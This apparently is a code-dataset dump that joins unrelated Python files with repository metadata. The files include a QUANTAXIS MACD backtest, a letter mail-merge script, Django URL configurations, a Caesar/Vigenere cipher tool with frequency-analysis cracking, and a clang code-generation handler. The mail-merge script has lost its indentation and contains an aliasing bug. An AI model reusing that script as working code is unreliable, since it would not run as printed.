    """Simple MACD cross-over backtest exercised through the QUANTAXIS API."""
    # define the MACD strategy
    def MACD_JCSC(self, dataframe, SHORT=12, LONG=26, M=9):
        """
        1. DIF crossing above DEA is a buy-signal reference.
        2. DIF crossing below DEA is a sell-signal reference.
        """
        CLOSE = dataframe.close
        DIFF = QA.EMA(CLOSE, SHORT) - QA.EMA(CLOSE, LONG)
        DEA = QA.EMA(DIFF, M)
        MACD = 2 * (DIFF - DEA)
        # golden cross (buy) / death cross (sell) indicator columns
        CROSS_JC = QA.CROSS(DIFF, DEA)
        CROSS_SC = QA.CROSS(DEA, DIFF)
        ZERO = 0
        return pd.DataFrame(
            {'DIFF': DIFF, 'DEA': DEA, 'MACD': MACD, 'CROSS_JC': CROSS_JC, 'CROSS_SC': CROSS_SC, 'ZERO': ZERO})
    def setUp(self):
        # prepare the data
        # create account
        self.Account = QA.QA_Account()
        self.Broker = QA.QA_BacktestBroker()
        self.Account.reset_assets(1000000)
        self.Account.account_cookie = 'user_admin_macd'
        # get data from mongodb
        self.data = QA.QA_fetch_stock_day_adv(
            ['000001', '000002', '000004', '600000'], '2017-09-01', '2018-05-20')
        self.data = self.data.to_qfq()
        # add indicator
        self.ind = self.data.add_func(self.MACD_JCSC)
        # ind.xs('000001',level=1)['2018-01'].plot()
        self.data_forbacktest = self.data.select_time(
            '2018-01-01', '2018-05-20')
    def tearDown(self):
        print(self.Account.history)
        print(self.Account.history_table)
        print(self.Account.daily_hold)
        # create Risk analysis
        Risk = QA.QA_Risk(self.Account)
        print(Risk.message)
        print(Risk.assets)
        Risk.plot_assets_curve()
        Risk.plot_dailyhold()
        Risk.plot_signal()
        # Risk.assets.plot()
        # Risk.benchmark_assets.plot()
        # save result
        self.Account.save()
        Risk.save()
        # round-trip the saved account back from storage
        account_info = QA.QA_fetch_account(
            {'account_cookie': 'user_admin_macd'})
        account = QA.QA_Account().from_message(account_info[0])
        print(account)
    def test_simpleQABacktest(self):
        # iterate day panels, and within each day every security
        for items in self.data_forbacktest.panel_gen:
            for item in items.security_gen:
                daily_ind = self.ind.loc[item.index]
                if daily_ind.CROSS_JC.iloc[0] > 0:
                    # golden cross: buy 1000 shares at the close price
                    order = self.Account.send_order(
                        code=item.code[0],
                        time=item.date[0],
                        amount=1000,
                        towards=QA.ORDER_DIRECTION.BUY,
                        price=0,
                        order_model=QA.ORDER_MODEL.CLOSE,
                        amount_model=QA.AMOUNT_MODEL.BY_AMOUNT
                    )
                    if order:
                        self.Broker.receive_order(QA.QA_Event(order=order, market_data=item))
                        trade_mes = self.Broker.query_orders(self.Account.account_cookie, 'filled')
                        res = trade_mes.loc[order.account_cookie, order.realorder_id]
                        order.trade(res.trade_id, res.trade_price,
                                    res.trade_amount, res.trade_time)
                elif daily_ind.CROSS_SC.iloc[0] > 0:
                    # death cross: sell the whole available position
                    if self.Account.sell_available.get(item.code[0], 0) > 0:
                        order = self.Account.send_order(
                            code=item.code[0],
                            time=item.date[0],
                            amount=self.Account.sell_available.get(
                                item.code[0], 0),
                            towards=QA.ORDER_DIRECTION.SELL,
                            price=0,
                            order_model=QA.ORDER_MODEL.MARKET,
                            amount_model=QA.AMOUNT_MODEL.BY_AMOUNT
                        )
                        if order:
                            self.Broker.receive_order(QA.QA_Event(order=order, market_data=item))
                            trade_mes = self.Broker.query_orders(self.Account.account_cookie, 'filled')
                            res = trade_mes.loc[order.account_cookie, order.realorder_id]
                            order.trade(res.trade_id, res.trade_price,
                                        res.trade_amount, res.trade_time)
            # settle the account at the end of each trading day
            self.Account.settle()
| [
"415496929@qq.com"
] | 415496929@qq.com |
3f31872d57224f64ff578a03c5a4ab5fa57cc9d0 | 9ddf19081a975a073dfbe478d448bcd2c948de51 | /Day 24 - Automatic Invitations/main.py | fa0b2706c0cfb7b1e622aa6d5f206b13dfe00d0f | [] | no_license | Drust2/100Days | 219f35d94f98abda3008350fbc2b458e953c94b6 | b456c5b0fde054105a9ce3904c1bb16699cd9c59 | refs/heads/main | 2023-05-10T23:15:04.116802 | 2021-06-03T18:58:16 | 2021-06-03T18:58:16 | 322,945,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,042 | py | #TODO: Create a letter using starting_letter.docx
#for each name in invited_names.txt
#Replace the [name] placeholder with the actual name.
#Save the letters in the folder "ReadyToSend".
#Hint1: This method will help you: https://www.w3schools.com/python/ref_file_readlines.asp
#Hint2: This method will also help you: https://www.w3schools.com/python/ref_string_replace.asp
#Hint3: THis method will help you: https://www.w3schools.com/python/ref_string_strip.asp
with open(r".\input\letters\starting_letter.docx", "r") as template_letter:
template = template_letter.readlines()
with open(r".\Input\Names\invited_names.txt", "r") as filen:
names = filen.readlines()
to_replace = "[name],"
for i in names:
current_name = i.strip()
letter = template
letter[0] = letter[0].replace(to_replace, current_name + ",")
title = f"Letter_for_{current_name}"
to_replace = current_name + ","
with open(f".\output\ReadyToSend\{title}.txt", "a") as file:
for i in letter:
file.write(i) | [
"noreply@github.com"
] | noreply@github.com |
b113b1db3bfe5f8e92de554cc4f803a2b126bac7 | 902e8b6f2c39c0a7baa8abd9637aa43f4be27e27 | /Code/Chapter 1/src/blueblog/urls.py | 9e80e946967b3d343885c7d48be82d6ec68c8c7b | [] | no_license | PacktPublishing/Django-Projects-Blueprints | 8151e611ae5cf95dc985ac7d08ce503bd41e0c4a | 7d2409ea1b43b057d1e4c337e348cb6e102f75d6 | refs/heads/master | 2023-02-08T13:34:22.658965 | 2023-01-30T10:17:40 | 2023-01-30T10:17:40 | 59,006,898 | 32 | 30 | null | null | null | null | UTF-8 | Python | false | false | 1,744 | py | from django.conf.urls import include
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from accounts.views import UserRegistrationView
from blog.views import NewBlogView
from blog.views import HomeView
from blog.views import UpdateBlogView
from blog.views import NewBlogPostView
from blog.views import UpdateBlogPostView
from blog.views import BlogPostDetailsView
from blog.views import SharePostWithBlog
from blog.views import StopSharingPostWithBlog
from blog.views import ShareBlogPostView
# URL routing for the whole project: admin, auth, blog CRUD and post sharing.
# NOTE(review): the blog/post/... patterns below lack the leading '^' anchor
# that the other patterns have -- presumably unintentional; confirm.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^$', HomeView.as_view(), name='home'),
    url(r'^new-user/$', UserRegistrationView.as_view(), name='user_registration'),
    # Function-based auth views with per-route template/redirect options.
    url(r'^login/$', login, {'template_name': 'login.html'}, name='login'),
    url(r'^logout/$', logout, {'next_page': '/login/'}, name='logout'),
    url(r'^blog/new/$', NewBlogView.as_view(), name='new-blog'),
    url(r'^blog/(?P<pk>\d+)/update/$', UpdateBlogView.as_view(), name='update-blog'),
    url(r'blog/post/new/$', NewBlogPostView.as_view(), name='new-blog-post'),
    url(r'blog/post/(?P<pk>\d+)/update/$', UpdateBlogPostView.as_view(), name='update-blog-post'),
    url(r'blog/post/(?P<pk>\d+)/$', BlogPostDetailsView.as_view(), name='blog-post-details'),
    url(r'blog/post/(?P<pk>\d+)/share/$', ShareBlogPostView.as_view(), name='share-blog-post-with-blog'),
    url(r'blog/post/(?P<post_pk>\d+)/share/to/(?P<blog_pk>\d+)/$', SharePostWithBlog.as_view(), name='share-post-with-blog'),
    url(r'blog/post/(?P<post_pk>\d+)/stop/share/to/(?P<blog_pk>\d+)/$', StopSharingPostWithBlog.as_view(), name='stop-sharing-post-with-blog'),
]
| [
"packt.danishs@gmail.com"
] | packt.danishs@gmail.com |
34b237ae8be56b9d1a13f968ccdbf955e4b68ab9 | 27d90c168a4cc7bc65d3f3658d1483aa9b852f5c | /HostingEcom/urls.py | 5609c9ae2a2832610fa567f219cf29d8408d606c | [] | no_license | ICTServ/HostingEcom | df46acb861e784054f3d2114ee169b16eb91e52d | 59cc5ce4cee51f532b8071b87663b9f31349b0eb | refs/heads/master | 2023-03-26T19:19:35.705713 | 2021-03-25T18:53:53 | 2021-03-25T18:53:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,073 | py | """HostingEcom URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
# Project-level routes: each app owns its own urls module; media files are
# served via static() (development convenience -- not for production).
urlpatterns = [
    path('admin/', admin.site.urls),
    path('accounts/', include('allauth.urls')),   # django-allauth login/signup
    path('', include('shop.urls')),               # storefront at site root
    path('users/', include('users.urls')),
    path('server/', include('server.urls'))
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"sbsarnava@gmail.com"
] | sbsarnava@gmail.com |
919f24c4fea2046bddb1761436745440bb6a53b0 | ad921025e128bb55fa84d84f79af2a8ff93adfa7 | /encryptor.py | 39996603084e477d1b96256c17e9b40aa144460d | [] | no_license | AlexeySafin924/Encryption-machine | 3f6c22594d746e02815221c84d0bd855d2f16a4b | fba2569bf541692fa78bf0b6b7440da08a9e378a | refs/heads/main | 2023-07-26T08:38:13.641317 | 2021-09-06T13:33:01 | 2021-09-06T13:33:01 | 403,263,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,117 | py | import argparse
import sys
import string
from collections import defaultdict
# Lookup tables between alphabet positions (0-25) and letters, both cases:
# *_from maps position -> letter, *_to maps letter -> position.
low_from = dict(enumerate(string.ascii_lowercase))
low_to = {letter: position for position, letter in enumerate(string.ascii_lowercase)}
big_from = dict(enumerate(string.ascii_uppercase))
big_to = {letter: position for position, letter in enumerate(string.ascii_uppercase)}
def is_low(symbol):
    """Return True if *symbol* is an ASCII lowercase letter (a key of low_to)."""
    return symbol in low_to
def is_big(symbol):
    """Return True if *symbol* is an ASCII uppercase letter (a key of big_to)."""
    return symbol in big_to
def change(shift, i):
    """Shift a single character *i* by *shift* positions within its case's
    alphabet (wrapping around); non-letters are returned unchanged."""
    if is_low(i):
        tables = (low_to, low_from)
    elif is_big(i):
        tables = (big_to, big_from)
    else:
        return i
    to_index, from_index = tables
    size = len(from_index)
    return from_index[(to_index[i] + shift + size) % size]
def caesar(input_string, shift, sign):
    """Apply a Caesar cipher to *input_string*.

    *shift* may be a string or int; *sign* is +1 to encrypt, -1 to decrypt.
    """
    offset = int(shift) * sign
    return "".join(change(offset, character) for character in input_string)
def vigenere(input_string, word, code):  # code = 1 means encrypt, -1 - decrypt
    """Apply a Vigenere cipher with key *word* (must be uppercase letters,
    since each key character is looked up in big_to).

    The key position only advances on letters, so punctuation and spaces
    pass through without consuming key characters.
    """
    pieces = []
    key_pos = 0
    for character in input_string:
        pieces.append(change(big_to[word[key_pos]] * code, character))
        if is_low(character) or is_big(character):
            key_pos = (key_pos + 1) % (len(word))
    return "".join(pieces)
def make_hist(input_string):
    """Return a letter-frequency histogram of *input_string*.

    Keys are the 26 uppercase letters; values are relative frequencies
    (they sum to 1.0 when the input contains at least one letter).
    """
    hist = defaultdict(float)
    total_numbers = 0
    for i in input_string:
        if is_big(i) or is_low(i):
            hist[i.upper()] += 1
            total_numbers += 1
    # Bug fix: the original divided unconditionally and raised
    # ZeroDivisionError on input with no letters at all.  In that case
    # every frequency is simply 0.0 (all 26 keys still get created,
    # as before, via the defaultdict access).
    if total_numbers == 0:
        for i in big_to:
            hist[i] = 0.0
        return hist
    for i in big_to:
        hist[i] /= total_numbers
    return hist
def train_caesar(input_string):
    """Build the frequency model used to hack Caesar ciphers.

    Thin wrapper: the model is just the letter histogram of the corpus.
    """
    hist = make_hist(input_string)
    return hist
def parse(model):
    """Parse a model file produced by ``str(dict(...))`` back into a dict.

    Input looks like ``{'A': 0.08, 'B': 0.01, ...}``; the result maps each
    single uppercase letter to its float frequency.
    """
    entries = model[1:-1].split(',')
    parsed = dict()
    for entry in entries:
        parts = entry.split()
        # parts[0] looks like "'A':" -- the letter itself sits at index 1.
        parsed[parts[0][1]] = float(parts[-1])
    return parsed
def hack_caesar(input_string, model):
    """Break a Caesar cipher by frequency analysis.

    Tries every possible shift, scoring each by the squared deviation
    between the ciphertext's shifted histogram and the trained *model*
    frequencies, then decrypts with the best-scoring shift.
    """
    norm = parse(model)
    hist = make_hist(input_string)
    best_shift = None
    min_dev = float('inf')
    for candidate in range(len(big_from)):
        deviation = 0
        for letter in hist:
            shifted = big_from[(big_to[letter] + candidate) % len(big_from)]
            deviation += (hist[shifted] - norm[letter]) ** 2
        if deviation < min_dev:
            min_dev = deviation
            best_shift = candidate
    return caesar(input_string, best_shift, -1)
def read(args, str):
    """Return the input text for a CLI action.

    When *str* is "text" the source is ``args.text_file``, otherwise
    ``args.input_file``; in either case stdin is the fallback when no
    file argument was given.  (NOTE: parameter name shadows the builtin
    ``str``; kept for interface compatibility.)
    """
    if str == "text":
        source = args.text_file
    else:
        source = args.input_file
    if source:
        return source.read()
    return sys.stdin.read()
def write(args, result):
    """Send *result* to ``args.output_file`` if given, else to stdout."""
    target = args.output_file if args.output_file else sys.stdout
    target.write(result)
def encrypt(args):
    """CLI action: encrypt the input text with the selected cipher."""
    plaintext = read(args, "input")
    cipher_fn = caesar if args.cipher == 'caesar' else vigenere
    write(args, cipher_fn(plaintext, args.key, 1))
def decrypt(args):
    """CLI action: decrypt the input text with the selected cipher."""
    ciphertext = read(args, "input")
    cipher_fn = caesar if args.cipher == 'caesar' else vigenere
    write(args, cipher_fn(ciphertext, args.key, -1))
def train(args):
    """CLI action: build a frequency model from the corpus and save it
    (as ``str(dict)``, the format ``parse`` reads back)."""
    corpus = read(args, "text")
    model = train_caesar(corpus)
    args.model_file.write(str(dict(model)))
def hack(args):
    """CLI action: break a Caesar cipher using a previously trained model."""
    ciphertext = read(args, "input")
    write(args, hack_caesar(ciphertext, args.model_file.read()))
# Command-line interface: one sub-command per action (encode/decode/train/
# hack), each wired to its handler through set_defaults(solve=...).
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
encode_parser = subparsers.add_parser('encode', help='Help for encode')
encode_parser.set_defaults(solve=encrypt)
encode_parser.add_argument('--cipher', choices=['caesar', 'vigenere'], help='Type of cipher', required=True)
encode_parser.add_argument('--key', help='Cipher key', required=True)
encode_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
encode_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
decode_parser = subparsers.add_parser('decode', help='Help for decode')
decode_parser.set_defaults(solve=decrypt)
decode_parser.add_argument('--cipher', choices=['caesar', 'vigenere'], help='Type of cipher', required=True)
decode_parser.add_argument('--key', help='Cipher key', required=True)
decode_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
decode_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
train_parser = subparsers.add_parser('train', help='Help for train')
train_parser.set_defaults(solve=train)
train_parser.add_argument('--text-file', type=argparse.FileType('r'), help='File for input')
train_parser.add_argument('--model-file', type=argparse.FileType('w'), help='File for model', required=True)
hack_parser = subparsers.add_parser('hack', help='Help for hack')
hack_parser.set_defaults(solve=hack)
hack_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
hack_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
hack_parser.add_argument('--model-file', type=argparse.FileType('r'), help='File for model', required=True)
# Dispatch: the chosen sub-parser decided which handler to run.
arguments = parser.parse_args()
arguments.solve(arguments)
| [
"safin.am@phystech.edu"
] | safin.am@phystech.edu |
e306046dfee373ba4e6be57818d704c98ff202fd | b716cf76b0e398f3666d8544ccfab47282520e08 | /main.py | a8d06c9a8d9e65b23207bccf5ba49c2bd46c64dc | [] | no_license | edgarlunaa/formato_txt_pandas | dc19e4ee8c69af2632709242e037553b3d7b9481 | cdcd5c1ea42049db812166faf54141110a003277 | refs/heads/main | 2023-03-22T17:51:43.548181 | 2021-03-18T16:21:30 | 2021-03-18T16:21:30 | 333,510,843 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,617 | py | from openpyxl import load_workbook
import pandas as pd
# Company code: selects the input workbook, the ministry legend and the
# output file names throughout the script.
codigo_empresa = '5533'
def dar_formato(txt, total, tipo):
    """Fit *txt* into a fixed-width field of *total* characters.

    tipo 'A' (alphanumeric) pads on the right with spaces; tipo 'N'
    (numeric) pads on the left with zeros; any other tipo leaves the
    text unpadded.  Text longer than *total* is truncated.
    """
    if tipo == 'A':
        txt = txt.ljust(total)
    elif tipo == 'N':
        txt = txt.rjust(total, '0')
    # Truncation is a no-op when the text already fits.
    return txt[:total]
# Build a fixed-width bank payment file from an Excel column layout
# ("formato.xlsx") and a payment dataframe ("<company>.xlsx").
wb = load_workbook("formato.xlsx")
ws_formato = wb.active
index = 1
columnas = []
# Collect the column spec rows: (ordinal, name, width, code) for every row
# whose width cell (column C) is a positive integer.
# NOTE(review): the bare except silently skips any malformed row.
for row in ws_formato:
    try:
        if int(row[2].value) > 0:
            tupla_columnas = (index, row[1].value, int(row[2].value), row[0].value)
            columnas.append(tupla_columnas)
            index = index + 1
    except:
        pass
col_list = ['MONTO', 'localidad', 'COD_SUCURSAL', 'NOMBRE_SUCURSAL', 'NOMBRES', 'APELLIDOS', 'CUIT', 'FECHA_DESDE', 'FECHA_HASTA', 'NRO_DOCUMENTO', 'DATOS BANCO']
df_cuotas = pd.read_excel(codigo_empresa+'.xlsx', usecols=col_list)
print(list(df_cuotas.columns))
# Drop the trailing ".0" that pandas adds when these columns are read as
# floats; skipped silently when they are already strings.
try:
    df_cuotas['COD_SUCURSAL'] = df_cuotas['COD_SUCURSAL'].astype(str).str.slice(0, -2, 1)
    df_cuotas['CUIT'] = df_cuotas['CUIT'].astype(str).astype(str).str.slice(0, -2, 1)
except:
    pass
print(df_cuotas['FECHA_HASTA'])
print(df_cuotas)
df_cuotas.to_excel(codigo_empresa+" formateado.xlsx", index=False)
print(df_cuotas)
# Header record: record count and grand total, both zero-padded; the
# total gets an implicit two-decimal suffix ("00").
calc_monto_gral = df_cuotas['MONTO'].sum()
monto_gral = dar_formato(str(calc_monto_gral), 10, 'N')
monto_gral = monto_gral + '00'
cantidad_registros = dar_formato(str(df_cuotas.shape[0]), 8, 'N')
txt = "00032021"+cantidad_registros+monto_gral+"000000000000000000002203202105042021020"+ codigo_empresa + dar_formato("", 953, 'A')
# One detail record per payment row, field by field.
for index, row in df_cuotas.iterrows():
    txt += "\n"
    txt += "00"
    # Payment group: date-from and date-to (DDMMYYYY, zero-padded).
    txt += dar_formato(str(row['FECHA_DESDE']), 8, 'N') + dar_formato(str(row['FECHA_HASTA']), 8, 'N')
    cuit = str(row['CUIT'])
    txt += dar_formato(cuit, 11, 'N')
    # Ex-caja / beneficiary type: fixed "000".
    txt += "000"
    txt += dar_formato(str(row['NRO_DOCUMENTO']), 8, 'N')
    # Bank: fixed = 020, then the 3-digit branch code.
    txt += "0020" + dar_formato(str(row['COD_SUCURSAL']), 3, 'N')
    apellido_nombre = str(row['APELLIDOS']) + " " + str(row['NOMBRES'])
    apellido_nombre = apellido_nombre.title().upper()
    txt += dar_formato(apellido_nombre, 27, 'A')
    # Document type: DNI = 1.
    txt += "1"
    txt += dar_formato(str(row['NRO_DOCUMENTO']), 8, 'N')
    # Issuing province (Cordoba = 04) followed by the attorney CUIL (zeros).
    txt += "0400000000000"
    # Attorney full name: blank.
    txt += dar_formato("", 27, 'A')
    # Attorney doc type/number, province, concept 1 code/subcode, then the
    # concept 1 amount with implicit two decimals.
    txt += "00000000004001000000" + str(row['MONTO']) + '00'
    # Columns 23 through 97 of the layout are emitted as one zero-filled
    # filler whose width is the sum of their spec widths plus 2.
    # NOTE(review): `sum` shadows the builtin -- harmless here but fragile.
    sum = 0
    for i in range(23,98):
        sum += columnas[i][2]
    sum += 2
    txt += dar_formato("", sum, 'N')
    # Flags: amount > $9,999 (1), liquidation period MMYY, payment type,
    # payment form (window = 0), account type (fixed 0).
    txt += "101210000"
    # Account number, next-payment date range: all zero-filled.
    txt += dar_formato("", 36, 'N')
    # Legends 1-4: government header; the ministry line depends on the
    # company code.
    if codigo_empresa == '5533':
        ministerio = 'MINISTERIO DE PROMOCION DEL EMPLEO Y E'
    elif codigo_empresa == '5541':
        ministerio = 'MINISTERIO DE DESARROLLO SOCIAL '
    programa = 'PROGRAMA VIDA DIGNA '
    txt += "GOBIERNO DE LA PROVINCIA DE CORDOBA "+ministerio+programa+"APODERADO DE "
    # Legend 5: beneficiary name, space-padded to 38.
    txt += dar_formato(apellido_nombre, 38, 'A')
    # Legends 6-8: blank.
    txt += dar_formato("", 114, 'A')
    # Paid/unpaid code (company always writes 1 = unpaid; the bank fills
    # the rest on reconciliation), then the net amount and company code.
    txt += "100000000000000000000000000 0000000000000000000000000000" + str(row['MONTO']) + '00' + codigo_empresa
    # Reserved for future use: spaces.
    txt += dar_formato("", 38, 'A')
f = open(codigo_empresa+".txt", "w")
f.write(txt)
f.close()
"edgaribarluna@gmail.com"
] | edgaribarluna@gmail.com |
bf2bd04d55b63d25a15b6344be797b303d828510 | 30e38ab7901cb20f7d80c961bbb0728fde4b02ae | /untitled0.py | 7ccff0567ed091c4150aebf6f470c6e11ef7cb49 | [] | no_license | Jmro2120/ClaseFundamentosDePogama | 1100ba1784883ef22c91ecbc39f737c46b39a799 | c03478ef5d60c0d86ad37e20d8df535311076ccb | refs/heads/main | 2023-03-06T20:26:19.548511 | 2021-02-19T02:01:01 | 2021-02-19T02:01:01 | 340,231,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 19:04:20 2021
@author: Liliana
"""
var_edad=int(input("ingrese su edad:"));
print("su edad es :",var_edad) | [
"78770549+Jmro2120@users.noreply.github.com"
] | 78770549+Jmro2120@users.noreply.github.com |
4b6c86cc1fcd9c0e3583792882c23f4208225094 | 48c6a6adc85b002e85771bdf1fc82a5159a1124d | /ctypeslib/codegen/handler.py | 57bb9f28449f73f74e7d479538f7ddee25f04c78 | [
"MIT"
] | permissive | pombreda/ctypeslib | 8afa8d8a3a01c48949f96173ce41b4a6aa94bad1 | c8f645991ba694c1fc43c1ba09643f201b01d3e4 | refs/heads/master | 2021-01-17T05:38:59.423578 | 2015-02-02T05:49:25 | 2015-02-02T05:49:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,461 | py | """Abstract Handler with helper methods."""
from clang.cindex import CursorKind, TypeKind
from ctypeslib.codegen import typedesc
from ctypeslib.codegen.util import log_entity
import logging
log = logging.getLogger('handler')
## DEBUG
import code
class CursorKindException(TypeError):
    """Signals that a child node of a VAR_DECL was parsed as an
    initialization value although it is not actually part of that
    initialization value.
    """
class InvalidDefinitionError(TypeError):
    """Raised for structures that are invalid in the source code: sizeof
    and alignof come back negative, which we detect so we can do our best
    anyway.
    """
class DuplicateDefinitionException(KeyError):
    """Raised upon encountering a duplicate declaration/definition name."""
################################################################
class ClangHandler(object):
    """
    Abstract class for handlers.

    A handler shares the parser's state: it registers/looks up generated
    typedesc objects, translates clang cursors and types, and classifies
    clang CursorKind/TypeKind values.  Unhandled kinds fall through to a
    warn-once no-op via __getattr__.
    """
    def __init__(self, parser):
        self.parser = parser
        # Kind names already warned about, so each is logged only once.
        self._unhandled = []

    # Registry helpers -- all delegate to the shared parser.
    def register(self, name, obj):
        """Register *obj* under *name* in the parser's registry."""
        return self.parser.register(name, obj)

    def get_registered(self, name):
        """Return the object registered under *name*."""
        return self.parser.get_registered(name)

    def is_registered(self, name):
        """Return True if *name* is already registered."""
        return self.parser.is_registered(name)

    def remove_registered(self, name):
        """Remove *name* from the parser's registry."""
        return self.parser.remove_registered(name)

    def set_location(self, obj, cursor):
        """ Location is also used for codegeneration ordering."""
        # Only record a location when the cursor actually carries one.
        if ( hasattr(cursor, 'location') and cursor.location is not None
             and cursor.location.file is not None):
            obj.location = (cursor.location.file.name, cursor.location.line)
        return

    def set_comment(self, obj, cursor):
        """ If a comment is available, add it to the typedesc."""
        if isinstance(obj, typedesc.T):
            obj.comment = cursor.brief_comment
        return

    def make_python_name(self, name):
        """Transforms an USR into a valid python name."""
        # Replace characters that are legal in USRs but not in identifiers.
        # FIXME see cindex.SpellingCache
        for k, v in [('<', '_'), ('>', '_'), ('::', '__'), (',', ''), (' ', ''),
                     ("$", "DOLLAR"), (".", "DOT"), ("@", "_"), (":", "_")]:
            if k in name:  # template
                name = name.replace(k, v)
        # FIXME: test case ? I want this func to be neutral on C valid names.
        if name.startswith("__"):
            return "_X" + name
        if len(name) == 0:
            raise ValueError
        elif name[0] in "01234567879":
            # Identifiers cannot start with a digit.
            # NOTE(review): the digit string contains '7' twice and no '8'
            # is missing -- "01234567879" -- presumably a typo for
            # "0123456789"; behavior is unaffected since membership still
            # covers all digits except none.  Confirm upstream.
            return "_" + name
        return name

    def get_unique_name(self, cursor):
        """Return a stable, python-usable name for *cursor*.

        Prefers displayname, then spelling; anonymous cursors fall back to
        a mangled USR (or None when even the USR is empty).  Record kinds
        get a struct_/union_/class_ prefix; TYPE_REF names have spaces
        replaced by underscores.
        """
        name = ''
        if hasattr(cursor, 'displayname'):
            name = cursor.displayname
        elif hasattr(cursor, 'spelling'):
            name = cursor.spelling
        if name == '' and hasattr(cursor, 'get_usr'):  # FIXME: should not get Type
            _id = cursor.get_usr()
            if _id == '':  # anonymous is spelling == ''
                return None
            name = self.make_python_name(_id)
        if cursor.kind == CursorKind.STRUCT_DECL:
            name = 'struct_%s' % (name)
        elif cursor.kind == CursorKind.UNION_DECL:
            name = 'union_%s' % (name)
        elif cursor.kind == CursorKind.CLASS_DECL:
            name = 'class_%s' % (name)
        elif cursor.kind == CursorKind.TYPE_REF:
            name = name.replace(' ', '_')
        return name

    def is_fundamental_type(self, t):
        """True when *t* maps directly to a ctypes fundamental type."""
        return (not self.is_pointer_type(t) and
                t.kind in self.parser.ctypes_typename.keys())

    def is_pointer_type(self, t):
        """True when *t* is a pointer TypeKind."""
        return t.kind == TypeKind.POINTER

    def is_array_type(self, t):
        """True for any of clang's array TypeKinds."""
        return (t.kind == TypeKind.CONSTANTARRAY or
                t.kind == TypeKind.INCOMPLETEARRAY or
                t.kind == TypeKind.VARIABLEARRAY or
                t.kind == TypeKind.DEPENDENTSIZEDARRAY )

    def is_unexposed_type(self, t):
        """True when clang did not expose the type's details."""
        return t.kind == TypeKind.UNEXPOSED

    def is_literal_cursor(self, t):
        """True when the cursor is one of clang's literal kinds."""
        return ( t.kind == CursorKind.INTEGER_LITERAL or
                 t.kind == CursorKind.FLOATING_LITERAL or
                 t.kind == CursorKind.IMAGINARY_LITERAL or
                 t.kind == CursorKind.STRING_LITERAL or
                 t.kind == CursorKind.CHARACTER_LITERAL)

    def get_literal_kind_affinity(self, literal_kind):
        ''' return the list of fundamental types that are adequate for which
        this literal_kind is adequate'''
        if literal_kind == CursorKind.INTEGER_LITERAL:
            return [TypeKind.USHORT, TypeKind.UINT, TypeKind.ULONG,
                    TypeKind.ULONGLONG, TypeKind.UINT128,
                    TypeKind.SHORT, TypeKind.INT, TypeKind.LONG,
                    TypeKind.LONGLONG, TypeKind.INT128, ]
        elif literal_kind == CursorKind.STRING_LITERAL:
            return [TypeKind.CHAR16, TypeKind.CHAR32, TypeKind.CHAR_S,
                    TypeKind.SCHAR, TypeKind.WCHAR ]  ## DEBUG
        elif literal_kind == CursorKind.CHARACTER_LITERAL:
            return [TypeKind.CHAR_U, TypeKind.UCHAR]
        elif literal_kind == CursorKind.FLOATING_LITERAL:
            return [TypeKind.FLOAT, TypeKind.DOUBLE, TypeKind.LONGDOUBLE]
        elif literal_kind == CursorKind.IMAGINARY_LITERAL:
            return []
        return []

    def get_ctypes_name(self, typekind):
        """Delegate: ctypes type name for a clang TypeKind."""
        return self.parser.get_ctypes_name(typekind)

    def get_ctypes_size(self, typekind):
        """Delegate: size of the ctypes type for a clang TypeKind."""
        return self.parser.get_ctypes_size(typekind)

    def parse_cursor(self, cursor):
        """Delegate cursor parsing back to the parser's dispatcher."""
        return self.parser.parse_cursor(cursor)

    def parse_cursor_type(self, _cursor_type):
        """Delegate type parsing back to the parser's dispatcher."""
        return self.parser.parse_cursor_type(_cursor_type)

    ################################
    # do-nothing element handlers
    @log_entity
    def _pass_through_children(self, node, **args):
        """Ignore *node* itself but dispatch each of its children."""
        for child in node.get_children():
            self.parser.startElement( child )
        return True

    def _do_nothing(self, node, **args):
        """Fallback handler: log the node and do nothing."""
        name = self.get_unique_name(node)
        #import code
        #code.interact(local=locals())
        log.warning('_do_nothing for %s/%s'%(node.kind.name, name))
        return True

    ###########################################
    # TODO FIXME: 100% cursor/type Kind coverage
    def __getattr__(self, name, **args):
        """Catch-all for unimplemented kind handlers: warn once per name,
        then return the no-op handler."""
        if name not in self._unhandled:
            log.warning('%s is not handled'%(name))
            self._unhandled.append(name)
        return self._do_nothing
| [
"loic.jaquemet+github@gmail.com"
] | loic.jaquemet+github@gmail.com |
f02dd9c32a0ef2a43dbd358dd6e79f6319d7e58a | d6a1269f0d1cc264b974cd462b1ff985eff9b303 | /apiV2/tests/test_registration.py | f33db91ee9f76aa001f874db51be8d8a3b79c824 | [
"MIT"
